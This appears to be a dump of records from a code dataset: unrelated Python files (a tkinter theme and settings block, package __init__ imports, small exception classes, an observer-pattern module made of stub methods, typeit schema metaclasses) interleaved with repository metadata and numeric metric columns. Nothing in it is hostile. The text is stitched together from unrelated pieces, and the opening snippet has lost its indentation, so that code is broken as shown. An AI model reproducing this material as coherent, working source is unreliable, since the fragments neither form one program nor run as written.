'draw_tertiary': 'grey',
'draw_principal': 'red',
'sb_draw':'#87aade',
'sb_draw_2nd':'#008080',
'sb_selected':'',
'sb_error':'',
'sb_negative':'',
'sb_grid':'#3f3f3f',
'path': 'figures/dark_theme/'
}
LIGHT_THEME = {
'main_color': '#d9dcdf',
'secondary_color': '#f4f2f4',
'text_color': '#333333',
'entry_color': '#d9dcdf',
'disabled_color':'#f4f2f4',
'error_color':'red',
'draw_main': '#a4ade9',
'draw_secondary': '#000000',
'draw_tertiary': '#4d4d4d',
'draw_principal': 'red',
'sb_draw':'#a4ade9',
'sb_draw_2nd':'#5d93d1',
'sb_selected':'',
'sb_error':'',
'sb_negative':'',
'sb_grid':'#c4c4c4',
'path': 'figures/light_theme/'
}
# CALL THE WINDOW ---------------------------------------------------------------------------------------------------------------------------------------
if __name__ == "__main__":
# Load settings from JSON file
settings_path = str(os.getenv('LOCALAPPDATA')) + "\\Aream\\app_settings.json"
print(settings_path)
try:
with open(settings_path) as f:
settings = json.load(f)
except:
print("404 app_settings.json not found")
settings_dir = str(os.getenv('LOCALAPPDATA')) + "\\Aream"
os.mkdir(settings_dir)
settings={'theme':'dark', 'default_unit':'mm', 'angle_unit':'rad', 'logo_enabled':'True'}
if settings['logo_enabled'] == 'True':
master = starting_window()
master.mainloop()
root = main_window()
root.mainloop()
with open(settings_path, 'w') as json_file:
json.dump({'theme':root.theme, 'default_unit':root.unit, 'angle_unit':root.angle_unit, 'logo_enabled':root.logo_enabled}, json_file)
| 53.360581
| 266
| 0.496256
| 8,043
| 69,849
| 4.214224
| 0.070496
| 0.066381
| 0.046674
| 0.053695
| 0.803068
| 0.768166
| 0.737601
| 0.721286
| 0.709574
| 0.684142
| 0
| 0.032616
| 0.328852
| 69,849
| 1,309
| 267
| 53.360581
| 0.690309
| 0.039943
| 0
| 0.56448
| 0
| 0.002262
| 0.124021
| 0.015899
| 0
| 0
| 0
| 0.000764
| 0
| 1
| 0.014706
| false
| 0
| 0.029412
| 0
| 0.057692
| 0.065611
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a4ca2a9590068fa530208f24cef4cee33b604d59
| 74
|
py
|
Python
|
refinery/__init__.py
|
nkryptic/django-refinery
|
142db49676a32e478fbdc7b5c8c13ac5bbb83beb
|
[
"BSD-3-Clause"
] | 3
|
2015-08-29T00:13:57.000Z
|
2017-12-20T11:45:24.000Z
|
refinery/__init__.py
|
nkryptic/django-refinery
|
142db49676a32e478fbdc7b5c8c13ac5bbb83beb
|
[
"BSD-3-Clause"
] | 3
|
2020-02-12T01:16:48.000Z
|
2021-06-10T20:37:32.000Z
|
refinery/__init__.py
|
nkryptic/django-refinery
|
142db49676a32e478fbdc7b5c8c13ac5bbb83beb
|
[
"BSD-3-Clause"
] | null | null | null |
from refinery.filtertool import FilterTool
from refinery.filters import *
| 24.666667
| 42
| 0.851351
| 9
| 74
| 7
| 0.555556
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 74
| 2
| 43
| 37
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a4d5d92bafd6ef805d5a31eb940ce4187fc210f0
| 240
|
py
|
Python
|
crawler/error/urlerror.py
|
DallasLJ/spider
|
53807439d4e8c3b63b8ff7f4b7d99109daf19a02
|
[
"Apache-2.0"
] | null | null | null |
crawler/error/urlerror.py
|
DallasLJ/spider
|
53807439d4e8c3b63b8ff7f4b7d99109daf19a02
|
[
"Apache-2.0"
] | null | null | null |
crawler/error/urlerror.py
|
DallasLJ/spider
|
53807439d4e8c3b63b8ff7f4b7d99109daf19a02
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
class Error(Exception):
pass
class DomainUrlError(Error):
def __init__(self, message):
self.message = message
class SpiderError(Error):
def __init__(self, message):
self.message = message
| 16
| 32
| 0.670833
| 27
| 240
| 5.666667
| 0.481481
| 0.287582
| 0.156863
| 0.20915
| 0.535948
| 0.535948
| 0.535948
| 0.535948
| 0
| 0
| 0
| 0.005348
| 0.220833
| 240
| 14
| 33
| 17.142857
| 0.812834
| 0.070833
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.125
| 0
| 0
| 0.625
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
a4da01cd80dcbd7361278b7b5ad277575ff24a8e
| 235
|
py
|
Python
|
thola_client/api/__init__.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | 1
|
2021-12-28T18:53:52.000Z
|
2021-12-28T18:53:52.000Z
|
thola_client/api/__init__.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | null | null | null |
thola_client/api/__init__.py
|
inexio/thola-client-python
|
f9a6812885738e33b1aed43ca55335b71e3d2b2d
|
[
"BSD-2-Clause"
] | null | null | null |
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from thola_client.api.check_api import CheckApi
from thola_client.api.identify_api import IdentifyApi
from thola_client.api.read_api import ReadApi
| 26.111111
| 53
| 0.846809
| 36
| 235
| 5.222222
| 0.5
| 0.143617
| 0.239362
| 0.287234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004808
| 0.114894
| 235
| 8
| 54
| 29.375
| 0.899038
| 0.174468
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
35071121c211879551774ea67a1d13dc095fba03
| 34
|
py
|
Python
|
kerastuner/oracles/__init__.py
|
haifeng-jin/kt-legacy
|
15686b5e2d25b7094134d68956b2edce5dffa7a0
|
[
"Apache-2.0"
] | 1
|
2022-03-29T21:49:22.000Z
|
2022-03-29T21:49:22.000Z
|
kerastuner/oracles/__init__.py
|
haifeng-jin/kt-legacy
|
15686b5e2d25b7094134d68956b2edce5dffa7a0
|
[
"Apache-2.0"
] | null | null | null |
kerastuner/oracles/__init__.py
|
haifeng-jin/kt-legacy
|
15686b5e2d25b7094134d68956b2edce5dffa7a0
|
[
"Apache-2.0"
] | 1
|
2022-02-14T18:57:19.000Z
|
2022-02-14T18:57:19.000Z
|
from keras_tuner.oracles import *
| 17
| 33
| 0.823529
| 5
| 34
| 5.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
3523a068f289afc2bdfb6601a7c270c2ebf47ac5
| 92
|
py
|
Python
|
tests/test_pyenv_feature_exec.py
|
dedale/pyenv-win
|
1c1a9448c9d6a4927d3102b42e43ccf9d6ab8fbe
|
[
"MIT"
] | 1
|
2021-04-21T01:49:07.000Z
|
2021-04-21T01:49:07.000Z
|
tests/test_pyenv_feature_exec.py
|
papercuptech/pyenv-win
|
6c51896809632d89d2852f8649ac627420f3fc68
|
[
"MIT"
] | null | null | null |
tests/test_pyenv_feature_exec.py
|
papercuptech/pyenv-win
|
6c51896809632d89d2852f8649ac627420f3fc68
|
[
"MIT"
] | null | null | null |
from test_pyenv import TestPyenvBase
class TestPyenvFeatureExec(TestPyenvBase):
pass
| 13.142857
| 42
| 0.815217
| 9
| 92
| 8.222222
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 92
| 6
| 43
| 15.333333
| 0.948718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
52b065ad296990be4c39067fc5a4301eae5fde5c
| 91
|
py
|
Python
|
sslib/shamir/__init__.py
|
Arthurlpgc/python-sslib
|
08699fea9119ae5ce66a7bbffb3521f8d3f14525
|
[
"MIT"
] | 9
|
2018-01-22T18:59:29.000Z
|
2021-12-26T20:44:52.000Z
|
sslib/shamir/__init__.py
|
Arthurlpgc/python-sslib
|
08699fea9119ae5ce66a7bbffb3521f8d3f14525
|
[
"MIT"
] | 2
|
2020-04-17T01:03:29.000Z
|
2022-01-09T21:41:38.000Z
|
sslib/shamir/__init__.py
|
Arthurlpgc/python-sslib
|
08699fea9119ae5ce66a7bbffb3521f8d3f14525
|
[
"MIT"
] | 6
|
2018-05-28T15:56:06.000Z
|
2021-12-08T18:48:18.000Z
|
from .shamir import split_secret, recover_secret, to_base64, from_base64, from_hex, to_hex
| 45.5
| 90
| 0.835165
| 15
| 91
| 4.666667
| 0.6
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 0.098901
| 91
| 1
| 91
| 91
| 0.804878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
52bc278b75566e9bdaf0090b6bf1e1497a65f76b
| 142
|
py
|
Python
|
shuttl/Templates/__init__.py
|
shuttl-io/shuttl-cms
|
50c85db0de42e901c371561270be6425cc65eccc
|
[
"MIT"
] | 2
|
2017-06-26T18:06:58.000Z
|
2017-10-11T21:45:29.000Z
|
shuttl/Templates/__init__.py
|
shuttl-io/shuttl-cms
|
50c85db0de42e901c371561270be6425cc65eccc
|
[
"MIT"
] | null | null | null |
shuttl/Templates/__init__.py
|
shuttl-io/shuttl-cms
|
50c85db0de42e901c371561270be6425cc65eccc
|
[
"MIT"
] | null | null | null |
# from app.loadModules import load_all_modules_from_dir
#
# load_all_modules_from_dir('Templates')
from .Tags import *
from .Loader import *
| 20.285714
| 55
| 0.795775
| 21
| 142
| 5
| 0.52381
| 0.133333
| 0.266667
| 0.342857
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119718
| 142
| 7
| 56
| 20.285714
| 0.84
| 0.647887
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
5e19549414814929493de6417cd267145efe3b0c
| 13,123
|
py
|
Python
|
mars/pattern_matching.py
|
TvrtkoSternak/MARS
|
4c1e5177b665f0f974b6c6efe548bde0d68986ae
|
[
"MIT"
] | null | null | null |
mars/pattern_matching.py
|
TvrtkoSternak/MARS
|
4c1e5177b665f0f974b6c6efe548bde0d68986ae
|
[
"MIT"
] | null | null | null |
mars/pattern_matching.py
|
TvrtkoSternak/MARS
|
4c1e5177b665f0f974b6c6efe548bde0d68986ae
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
from .pattern import Pattern
class Reader(ABC):
"""
This class corresponds to the Subject role in Observer pattern. It contains the collection of IListener objects and
methods for adding/removing them, along with the ability to notify them about change.
...
Attributes
----------
listeners : list of IListener
List of observers that are listening for changes
Methods
-------
public void notify(self)
Notifies all subscribed listeners about change.
public void subscribe(self, listener)
Adds the received IListener object to the list of subscribed listeners.
public void unsubscribe(self,listener)
Removes the received IListener object from the list of subscribed listeners.
"""
def __init__(self):
self.listeners = []
def notify(self):
"""
Notifies all subscribed listeners about change
"""
pass
def subscribe(self, listener):
"""
Adds the received IListener object to the list of subscribed listeners
Parameters
----------
listener : IListener
IListener to subscribe
"""
pass
def unsubscribe(self, listener):
"""
Removes the received IListener object from the list of subscribed listeners
Parameters
----------
listener: IListener
IListener to unsubscribe
"""
pass
class Recommender(Reader):
"""
This class corresponds to the Concrete Subject role in Observer pattern. Recommender is the core class which extends
Reader class. This object is the “keeper” of the uploaded code in the form of AST. Its responsibility is iterating
through the nodes and notifying all attached observers about the change of current node and requesting checking for
matches. Once all the nodes have been visited it returns the found recommendations. The found patterns can be parsed
into arbitrary format by providing appropriate IPatternParser object when instantiating Recommender object.
...
Attributes
----------
listeners : list of IListener
List of observers that are listening for changes
uploaded_ast : ast
AST of the code that needs to be matched
parser : IPatternParser
Parser used for parsing found matches into understandable format
Methods
-------
public __init__(self, parser)
Initialises Recommender object.
public void notify(self)
Notifies all subscribed listeners about change.
public void subscribe(self, listener)
Adds the received IListener object to the list of subscribed listeners.
public void unsubscribe(self,listener)
Removes the received IListener object from the list of subscribed listeners.
public File get_recommendations(self)
Finds the matches for uploaded code block and returns file with recommendations.
public void parse(self, pattern_matcher)
Parses the IPatternMatcher object into the format determined by the parser.
"""
def __init__(self, parser):
"""
Initialises Recommender object
Parameters
----------
parser : IPatternParser
Parser object for parsing matches
"""
super().__init__()
self.parser = parser
def get_recommendations(self):
"""
Finds the matches for uploaded code block and returns file with recommendations
Returns
-------
File
File with found recommendations
"""
pass
def parse(self, pattern_matcher):
"""
Parses the IPatternMatcher object into the format determined by the parser
Parameters
----------
pattern_matcher: IPatternMatcher
IPatternMatcher to be parsed
"""
pass
class IListener(ABC):
"""
This class corresponds to the Observer role in theObserver design pattern.
...
Methods
-------
public void update(self)
Performs the appropriate update operation for the concrete implementation
"""
@abstractmethod
def update(self):
"""
Performs the appropriate update operation for the concrete implementation
"""
pass
class IPatternFactory(ABC):
"""
This class describes classes that are used for creating IPatternMatcher objects. When the factory finds a match, it
creates all patterns that start with the found match.
...
Methods
-------
public IPatternMatcher create_pattern(self)
Creates IPatternMatcher object for the detected pattern.
"""
@abstractmethod
def create_pattern(self):
"""
Creates and returns IPatternMatcher object for the detected pattern.
Returns
-------
IPatternMatcher
IPatternMatcher that contains a Pattern that the concrete factory is responsible for creating.
"""
pass
class IPatternMatcher(ABC):
"""
This class is responsible for checking if two patterns match.
...
Attributes
----------
pattern : Pattern
Pattern object that is being checked against incoming patterns for matches
wildcard_matches : list of ast
List of ASTs that were matched to wildcard nodes in the IPatternMatcher Pattern object. Used later in parsing of
the matched patterns.
Methods
-------
public __init__(pattern)
Initialises IPatternMatcher with pattern to match
public bool check_match(self, node)
Check if the input node matches the IPatternMatcher node that is next in the pattern.
"""
def __init__(self, pattern):
"""
Initialises IPatternMatcher with pattern to match
Parameters
----------
pattern : Pattern
Pattern object that is being checked against incoming patterns for matches
"""
self.pattern = pattern
@abstractmethod
def check_match(self, node):
"""
Check if the input node matches the IPatternMatcher node that is next in the pattern.
Parameters
node: ast
AST node that is checked for match in next IPatternMatcher Pattern node
Returns
bool
True if the nodes match, false otherwise
"""
pass
class PatternFactoryListener(IPatternFactory, IPatternMatcher, IListener):
"""
This class corresponds to the Concrete Observer role in the Observer design pattern. It inherits from
IListener, IPatternMatcher and IPatternFactory. It is used for creating PatternListener objects. When update is
called it retrieves the current node from Recommender and checks for match. If the match is found, appropriate
PatternListener is created and subscribed to Recommender.
...
Attributes
----------
recommender : Recommender
Recommender object that the listener is listening to
pattern: Pattern
IPatternMatcher own Pattern object that is being checked against incoming patterns for matches
wildcard_matches: list of ast
List of ASTs that were matched to wildcard nodes in the IPatternMatcher Pattern object. Used later in parsing of
the matched patterns.
Methods
-------
public __init__(self, pattern, recommender)
Initialises PatternFactoryListener
public void update(self)
Method called by the Reader class. When this method is called PatternFactoryListener object retrieves the
current node from Recommender and checks for match, if the node matches then the PatternFactoryListener creates
a designated PatternListener.
public void create_pattern(self):
Creates and returns IPatternMatcher object for the detected pattern.
public bool check_match(self, node):
Check if the input node matches the IPatternMatcher node that is next in the pattern.
"""
def __init__(self, pattern, recommender):
"""
Initialises PatternFactoryListener.
Parameters
----------
pattern : Pattern
Pattern it is creating
recommender : Recommender
Recommender object that the listener is listening to.s
"""
pass
def update(self):
"""
Method called by the Reader class. When this method is called PatternFactoryListener object retrieves the
current node from Recommender and checks for match, if the node matches then the PatternFactoryListener creates
a designated PatternListener.
"""
pass
def create_pattern(self):
"""
Creates and returns IPatternMatcher object for the detected pattern.
Returns
-------
IPatternMatcher
IPatternMatcher that contains a Pattern that the concrete factory is responsible for creating
"""
pass
def check_match(self, node):
"""
Check if the input node matches the IPatternMatcher node that is next in the pattern.
Parameters
----------
node : ast
AST node that is checked for match in next IPatternMatcher Pattern node
Returns
-------
bool
True if the nodes match, false otherwise
"""
pass
class PatternListener(IListener, IPatternMatcher):
"""
This class corresponds to the Concrete Observer role in the Observer design pattern. It inherits from IListener and
IPatternMatcher. When the current node in Reader changes this class checks if the now new current node matches with
the pattern. If it does match, it goes on with checking. If it does not, it removes itself from the list of
listeners in the Reader.
...
Attributes
----------
recommender : Recommender
Recommender object that the listener is listening to
pattern : Pattern
IPatternMatcher own Pattern object that is being checked against incoming patterns for matches
wildcard_matches : list of ast
List of ASTs that were matched to wildcard nodes in the IPatternMatcher Pattern object. Used later in parsing of
the matched patterns
index : int
Index of the last checked node
Methods
-------
public __init__(self, pattern, recommender)
Initialises PatternListener
public void update(self)
Method called by the Reader class. When this method is called PatternListener object retrieves the current node
from Recommender and checks for match. If the node is not a match, then PatternListener unsubscribes from the
Reader.
If the pattern is a match there are two scenarios:
1) The matched node is the last node in the Pattern:
Pattern listener unsubscribes from the reader and requests parsing.
2) The matched node is not the last node in the pattern:
Pattern listener increments its internal node count and continues to listen for updates from the reader.
public void create_pattern(self)
Creates and returns IPatternMatcher object for the detected pattern.
public bool check_match(self, node)
Check if the input node matches the IPatternMatcher node that is next in the pattern.
public void unsubscribe(self)
Removes itself from the list of listeners in the associated Reader object.
"""
def __init__(self, pattern, recommender):
"""
Initialises PatternListener.
Parameters
----------
pattern : Pattern
Pattern it is matching
recommender : Recommender
Recommender object that the listener is listening to.s
"""
pass
def update(self):
"""
Method called by the Reader class. When this method is called PatternListener object retrieves the current node
from Recommender and checks for match. If the node is not a match, then PatternListener unsubscribes from the
Reader.
If the pattern is a match there are two scenarios:
1) The matched node is the last node in the Pattern:
Pattern listener unsubscribes from the reader and requests parsing.
2) The matched node is not the last node in the pattern:
Pattern listener increments its internal node count and continues to listen for updates from the reader.
"""
pass
def check_match(self, node):
"""
Check if the input node matches the IPatternMatcher node that is next in the pattern.
Parameters
----------
node : ast
AST node that is checked for match in next IPatternMatcher Pattern node
Returns
-------
bool
True if the nodes match, false otherwise
"""
pass
def unsubscribe(self):
"""
Removes itself from the list of listeners in the associated Reader object.
"""
pass
| 33.391858
| 120
| 0.657319
| 1,512
| 13,123
| 5.665344
| 0.125
| 0.013308
| 0.014009
| 0.018212
| 0.768153
| 0.761616
| 0.711767
| 0.690988
| 0.685034
| 0.680364
| 0
| 0.00043
| 0.290559
| 13,123
| 393
| 121
| 33.391858
| 0.919656
| 0.760192
| 0
| 0.568627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.372549
| false
| 0.313725
| 0.039216
| 0
| 0.54902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
eaa29bdbc614cc067a3532c32d265a26004eb206
| 172
|
py
|
Python
|
omniprint/dataloader/__init__.py
|
SunHaozhe/OmniPrint
|
63a01d3b5592844c7f84460a10cc5fedf3a04fe4
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 8
|
2021-01-20T17:04:32.000Z
|
2022-01-24T03:22:51.000Z
|
omniprint/dataloader/__init__.py
|
SunHaozhe/OmniPrint
|
63a01d3b5592844c7f84460a10cc5fedf3a04fe4
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
omniprint/dataloader/__init__.py
|
SunHaozhe/OmniPrint
|
63a01d3b5592844c7f84460a10cc5fedf3a04fe4
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2022-02-23T13:08:02.000Z
|
2022-02-23T13:08:02.000Z
|
from .omniglot_like_dataloader import OmniglotLikeDataloader
from .torch_datasets import MultilingualDataset
from .omniglot_like_Z_dataloader import OmniglotLikeZDataloader
| 57.333333
| 63
| 0.918605
| 18
| 172
| 8.444444
| 0.611111
| 0.157895
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063953
| 172
| 3
| 63
| 57.333333
| 0.944099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
eaddac6c5db2afe815269fd0d28ca154ecea9999
| 37
|
py
|
Python
|
pyARC/RunNestedSamplingDef.py
|
tomevans/pyARC
|
935e3d9b49bca36433e4fb85a43c42b1d10d561d
|
[
"MIT"
] | null | null | null |
pyARC/RunNestedSamplingDef.py
|
tomevans/pyARC
|
935e3d9b49bca36433e4fb85a43c42b1d10d561d
|
[
"MIT"
] | null | null | null |
pyARC/RunNestedSamplingDef.py
|
tomevans/pyARC
|
935e3d9b49bca36433e4fb85a43c42b1d10d561d
|
[
"MIT"
] | null | null | null |
def Main( ARC ):
return None
| 5.285714
| 16
| 0.540541
| 5
| 37
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.378378
| 37
| 6
| 17
| 6.166667
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
eafd3741f9631eb546099a984b15f467c289aa45
| 71
|
py
|
Python
|
ctf/__init__.py
|
documentedai/capture-the-flag
|
4dbfba094f2a56a6b581098b603fe49a4515efb6
|
[
"BSD-3-Clause"
] | null | null | null |
ctf/__init__.py
|
documentedai/capture-the-flag
|
4dbfba094f2a56a6b581098b603fe49a4515efb6
|
[
"BSD-3-Clause"
] | 3
|
2020-04-22T01:12:06.000Z
|
2020-04-26T17:59:11.000Z
|
ctf/__init__.py
|
documentedai/capture-the-flag
|
4dbfba094f2a56a6b581098b603fe49a4515efb6
|
[
"BSD-3-Clause"
] | null | null | null |
from ctf.api import Ctf
from ctf.version import VERSION as __version__
| 23.666667
| 46
| 0.830986
| 12
| 71
| 4.583333
| 0.5
| 0.254545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140845
| 71
| 2
| 47
| 35.5
| 0.901639
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d827e265dd61d84a64abe86078281dc791404557
| 77
|
py
|
Python
|
configs/exp_configs/__init__.py
|
ElementAI/data-augmentation-with-llms
|
23673ab55cfb72295468e92ae58d0906f5dc7b05
|
[
"Apache-2.0"
] | 2
|
2022-03-30T21:23:41.000Z
|
2022-03-31T10:00:07.000Z
|
configs/exp_configs/__init__.py
|
ElementAI/data-augmentation-with-llms
|
23673ab55cfb72295468e92ae58d0906f5dc7b05
|
[
"Apache-2.0"
] | null | null | null |
configs/exp_configs/__init__.py
|
ElementAI/data-augmentation-with-llms
|
23673ab55cfb72295468e92ae58d0906f5dc7b05
|
[
"Apache-2.0"
] | null | null | null |
from . import fs_exps
EXP_GROUPS = {}
EXP_GROUPS.update(fs_exps.EXP_GROUPS)
| 15.4
| 37
| 0.779221
| 13
| 77
| 4.230769
| 0.538462
| 0.490909
| 0.327273
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116883
| 77
| 4
| 38
| 19.25
| 0.808824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
dc22b1665dc9b51bb5bb3db59df9627295748a20
| 1,684
|
py
|
Python
|
typeit/schema/meta.py
|
avanov/type
|
dbf2a94de13b592987695b7346f10cbf53acf3af
|
[
"MIT"
] | 8
|
2018-06-17T16:01:12.000Z
|
2021-11-05T23:34:55.000Z
|
typeit/schema/meta.py
|
avanov/type
|
dbf2a94de13b592987695b7346f10cbf53acf3af
|
[
"MIT"
] | 71
|
2018-06-23T15:31:56.000Z
|
2021-03-09T16:56:50.000Z
|
typeit/schema/meta.py
|
avanov/type
|
dbf2a94de13b592987695b7346f10cbf53acf3af
|
[
"MIT"
] | 1
|
2021-11-05T23:34:57.000Z
|
2021-11-05T23:34:57.000Z
|
from typing import Type, NamedTuple, Tuple as PyTuple, Any
import colander as col
from pyrsistent import pvector
from pyrsistent.typing import PVector
from . import nodes
from ..combinator.combinator import Combinator
class TypeExtension(NamedTuple):
typ: Type
schema: PyTuple[Type['SchemaType'], PVector[Any]]
def __and__(self, other) -> Combinator:
return Combinator() & self & other
def __add__(self, other) -> 'TypeExtension':
return self._replace(
schema=(self.schema[0], self.schema[1].append(nodes.SchemaNode(other)))
)
class SubscriptableSchemaTypeM(type):
""" A metaclass for schemas that allow specifying types
for which they are defined during type construction composition.
The *M suffix in the name stands for "Meta" to indicate that
this class should be used only as a metaclass.
"""
def __getitem__(cls: Type['SchemaType'], item: Type) -> TypeExtension:
# ``cls`` is a schema type here
return TypeExtension(
typ=item,
schema=(cls, pvector()),
)
def __repr__(self) -> str:
return f'{self.__name__}'
__str__ = __repr__
class SchemaType(col.SchemaType, metaclass=SubscriptableSchemaTypeM):
pass
class Int(col.Int, metaclass=SubscriptableSchemaTypeM):
pass
class Bool(col.Bool, metaclass=SubscriptableSchemaTypeM):
pass
class Str(col.Str, metaclass=SubscriptableSchemaTypeM):
pass
class Float(col.Float, metaclass=SubscriptableSchemaTypeM):
pass
class Tuple(col.Tuple, metaclass=SubscriptableSchemaTypeM):
pass
class Mapping(col.Mapping, metaclass=SubscriptableSchemaTypeM):
pass
| 24.057143
| 83
| 0.701306
| 190
| 1,684
